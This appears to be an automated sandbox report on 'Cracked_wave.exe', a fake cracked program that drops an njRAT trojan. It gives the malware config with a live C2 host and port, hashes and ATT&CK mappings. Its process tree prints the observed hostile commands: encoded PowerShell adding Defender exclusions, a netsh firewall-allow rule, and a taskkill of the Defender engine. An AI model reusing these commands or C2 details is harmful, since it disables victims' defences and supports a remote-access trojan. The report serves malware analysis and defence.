Overview

overview

10

Static

static

3

Cracked_wave.exe

windows7-x64

10

Cracked_wave.exe

windows10-2004-x64

9

Analysis

  • max time kernel
    150s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    26-07-2024 19:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Cracked_wave.exe

  • Size

    26.0MB

  • MD5

    9330b25f7ac3eb34a5f5b8f724e9cda1

  • SHA1

    29853b957e4b073f83f25fc7b333a4fc262792e3

  • SHA256

    b4dbcee5210537d5ec0a232990fccb8018bf898c88636849e6fc4bb38de62436

  • SHA512

    c3fdf6114fc370d8db27091f1e4b3e19fc123e05bbba3b1f96c748d25bacccb8b32f2da9a96141a7b6af524a66fda67658aab5aa75f93fdb29031a43bc7a885d

  • SSDEEP

    786432:B7zjkRQo93SGLxRIHn6MX52t7wQepJ1kNXXjh:WmsD1M6O52tRev1k1Th

Score
10/10
njrathackeddefense_evasiondiscoveryevasionpersistenceprivilege_escalationpyinstallertrojan

Malware Config

Extracted

Family

njrat

Version

im523

Botnet

HacKed

C2

20.ip.gl.ply.gg:55257

Mutex

319c1637f1925d788496e1f3109ae4f7

Attributes
  • reg_key

    319c1637f1925d788496e1f3109ae4f7

  • splitter

    |'|'|

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Drops startup file 2 IoCs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 11 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Drops autorun.inf file 1 TTPs 5 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in Windows directory 2 IoCs
  • Detects Pyinstaller 1 IoCs
    pyinstaller
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Kills process with taskkill 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 39 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Cracked_wave.exe
    "C:\Users\Admin\AppData\Local\Temp\Cracked_wave.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:776
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAcABrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAdgBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAZAB6ACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1292
    • C:\Users\Admin\AppData\Roaming\WaveWindows.exe
      "C:\Users\Admin\AppData\Roaming\WaveWindows.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2352
    • C:\Users\Admin\AppData\Local\Builder.exe
      "C:\Users\Admin\AppData\Local\Builder.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2672
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAbQB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAbgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAaABkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAaABxACMAPgA="
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2748
      • C:\Windows\Systeminteracts (32 bit).exe
        "C:\Windows\Systeminteracts (32 bit).exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2636
        • C:\Users\Admin\AppData\Roaming\wsappx.exe
          "C:\Users\Admin\AppData\Roaming\wsappx.exe"
          4⤵
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops autorun.inf file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2624
          • C:\Windows\SysWOW64\netsh.exe
            netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\wsappx.exe" "wsappx.exe" ENABLE
            5⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:2008
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM MsMpEng.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2064
      • C:\Users\Admin\OneDrive.exe
        "C:\Users\Admin\OneDrive.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2852
        • C:\Users\Admin\OneDrive.exe
          "C:\Users\Admin\OneDrive.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:1440

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

1
T1091

Execution

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Create or Modify System Process

1
T1543

Windows Service

1
T1543.003

Event Triggered Execution

1
T1546

Netsh Helper DLL

1
T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Create or Modify System Process

1
T1543

Windows Service

1
T1543.003

Event Triggered Execution

1
T1546

Netsh Helper DLL

1
T1546.007

Defense Evasion

Impair Defenses

1
T1562

Disable or Modify System Firewall

1
T1562.004

Modify Registry

1
T1112

Obfuscated Files or Information

1
T1027

Command Obfuscation

1
T1027.010

Credential Access

Discovery

System Information Discovery

1
T1082

System Location Discovery

1
T1614

System Language Discovery

1
T1614.001

Lateral Movement

Replication Through Removable Media

1
T1091

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\_MEI28522\api-ms-win-core-file-l1-2-0.dll
    Filesize

    21KB

    MD5

    1c58526d681efe507deb8f1935c75487

    SHA1

    0e6d328faf3563f2aae029bc5f2272fb7a742672

    SHA256

    ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2

    SHA512

    8edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\_MEI28522\api-ms-win-core-file-l2-1-0.dll
    Filesize

    18KB

    MD5

    bfffa7117fd9b1622c66d949bac3f1d7

    SHA1

    402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

    SHA256

    1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

    SHA512

    b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\_MEI28522\api-ms-win-core-localization-l1-2-0.dll
    Filesize

    21KB

    MD5

    724223109e49cb01d61d63a8be926b8f

    SHA1

    072a4d01e01dbbab7281d9bd3add76f9a3c8b23b

    SHA256

    4e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210

    SHA512

    19b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\_MEI28522\api-ms-win-core-timezone-l1-1-0.dll
    Filesize

    21KB

    MD5

    d12403ee11359259ba2b0706e5e5111c

    SHA1

    03cc7827a30fd1dee38665c0cc993b4b533ac138

    SHA256

    f60e1751a6ac41f08e46480bf8e6521b41e2e427803996b32bdc5e78e9560781

    SHA512

    9004f4e59835af57f02e8d9625814db56f0e4a98467041da6f1367ef32366ad96e0338d48fff7cc65839a24148e2d9989883bcddc329d9f4d27cae3f843117d0

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\_MEI28522\python39.dll
    Filesize

    4.3MB

    MD5

    5cd203d356a77646856341a0c9135fc6

    SHA1

    a1f4ac5cc2f5ecb075b3d0129e620784814a48f7

    SHA256

    a56afcf5f3a72769c77c3bc43c9b84197180a8b3380b6258073223bfd72ed47a

    SHA512

    390008d57fa711d7c88b77937bf16fdb230e7c1e7182faea6d7c206e9f65ced6f2e835f9da9befb941e80624abe45875602e0e7ad485d9a009d2450a2a0e0f1f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\_MEI28522\ucrtbase.dll
    Filesize

    992KB

    MD5

    0e0bac3d1dcc1833eae4e3e4cf83c4ef

    SHA1

    4189f4459c54e69c6d3155a82524bda7549a75a6

    SHA256

    8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

    SHA512

    a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RXMJVXUS78U77FN4MK16.temp
    Filesize

    7KB

    MD5

    87e26b2538608b5e171e29dd06db8a5e

    SHA1

    d6a0d6628ef768440ae08a5ea80fe7718fe4dcf6

    SHA256

    369b284ef981ea386048913b84005b77c6ddab331697d18299b6504b2f4aa3b2

    SHA512

    463d65290694805d619b7a8c575df15058b247cdd8f28e3d1d93341d7fefda8fad96565ea8e12719d1c982b509fdca0b84d72ed815bb82e373522d2ba97bd6c4

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    314e6523e04e2d8314fc607cf9ec2f65

    SHA1

    ab0eb632e37bbd142f0455c00d01a540a67f674f

    SHA256

    5fe3123de7b9f6e3bc05922b2bf544b7d406864f760f6a99e601e44f3533d67c

    SHA512

    0b27beb891a87d2b113af0719154a37c06795b4cf7846a1b135987aa58676c4fc1ae31dcb93693af9854e1528ea0527900a7bb941d34b7132a4f12e6a25c2353

    Download Submit

  • C:\Users\Admin\OneDrive.exe
    Filesize

    17.7MB

    MD5

    6624b0557bdbe30b3f3095e5c72ff3b1

    SHA1

    1ebfece0cf160f9a01ce15cf191b0e1bedadfdea

    SHA256

    500fcb5105e0ad997d404f7cad43f72db8bc32dfd6dc3f83e9bb6dcb94dfe49c

    SHA512

    f8ee5149c76acf1b5f44bfd0c84c53934b1fa7fafd61bb23093d348dfcf8156ded762816fb988a727bfe828369696fea79b37d9fddf915ce672caf9c0f2971fe

    Download Submit

  • C:\Windows\Systeminteracts (32 bit).exe
    Filesize

    37KB

    MD5

    fb3f9f675ace4b0e2e3938b40b4a016e

    SHA1

    e45bd61c9830bbdaa413f1e5addf2e05c9ccfd6e

    SHA256

    d2673072e29073998e65da0023a0f4f6d96493ecdfbfee84b044b1947eef11d5

    SHA512

    ebd2ff3940962155c9ee78dced5a2a2967f81084707e111a47af7fc60109996f4c87ab962c3deac1336464677b99cb48ea3ef76315cedcfd68232678439505f9

    Download Submit

  • \Users\Admin\AppData\Local\Builder.exe
    Filesize

    17.8MB

    MD5

    d62817e1f87aedd6b9fdfae5d80d706a

    SHA1

    a98f0f233417d339d831b6989f09322610c8557f

    SHA256

    22b8be8e56910f91060262cf18ae227a13ef5da69f4eb781d98ff81d238fe7fc

    SHA512

    a72394560340f4032d19a2b578023d56cd6b2e710cf0cf3562d824a3c8d72d54ac1cf4e6f64d17524f3410d3b1773486b8e8654d9dbe3a7e96ecbf212e4c3603

    Download Submit

  • \Users\Admin\AppData\Local\Temp\_MEI28522\api-ms-win-core-processthreads-l1-1-1.dll
    Filesize

    21KB

    MD5

    517eb9e2cb671ae49f99173d7f7ce43f

    SHA1

    4ccf38fed56166ddbf0b7efb4f5314c1f7d3b7ab

    SHA256

    57cc66bf0909c430364d35d92b64eb8b6a15dc201765403725fe323f39e8ac54

    SHA512

    492be2445b10f6bfe6c561c1fc6f5d1af6d1365b7449bc57a8f073b44ae49c88e66841f5c258b041547fcd33cbdcb4eb9dd3e24f0924db32720e51651e9286be

    Download Submit

  • \Users\Admin\AppData\Roaming\WaveWindows.exe
    Filesize

    8.0MB

    MD5

    b8631bbd78d3935042e47b672c19ccc3

    SHA1

    cd0ea137f1544a31d2a62aaed157486dce3ecebe

    SHA256

    9cfda541d595dc20a55df5422001dfb58debd401df3abff21b1eee8ede28451c

    SHA512

    0c51d6247e39f7851538a5916b24972e845abfe429f0abdc7b532f654b4afe73dc6e1936f1b062da63bfc90273d3cbc297bf6c802e615f3711d0f180c070aa26

    Download Submit

  • memory/2352-161-0x00000000006B0000-0x0000000000762000-memory.dmp

    Filesize

    712KB

    Download

  • memory/2352-190-0x0000000000CB0000-0x0000000000CBA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2352-172-0x0000000000510000-0x0000000000518000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2352-170-0x0000000000E50000-0x0000000000EF0000-memory.dmp

    Filesize

    640KB

    Download

  • memory/2352-10-0x0000000001250000-0x0000000001A52000-memory.dmp

    Filesize

    8.0MB

    Download

  • memory/2352-188-0x0000000000770000-0x000000000077A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2352-189-0x0000000000770000-0x000000000077A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2352-174-0x0000000000530000-0x0000000000538000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2352-191-0x0000000006810000-0x0000000006886000-memory.dmp

    Filesize

    472KB

    Download

  • memory/2352-192-0x0000000000D20000-0x0000000000D2A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2352-193-0x0000000001090000-0x00000000010C2000-memory.dmp

    Filesize

    200KB

    Download

  • memory/2352-194-0x00000000011D0000-0x00000000011F6000-memory.dmp

    Filesize

    152KB

    Download

  • memory/2352-195-0x00000000010C0000-0x00000000010C8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2352-197-0x0000000005230000-0x0000000005246000-memory.dmp

    Filesize

    88KB

    Download

  • memory/2352-199-0x00000000053D0000-0x00000000053DA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2352-346-0x0000000000770000-0x000000000077A000-memory.dmp

    Filesize

    40KB

    Download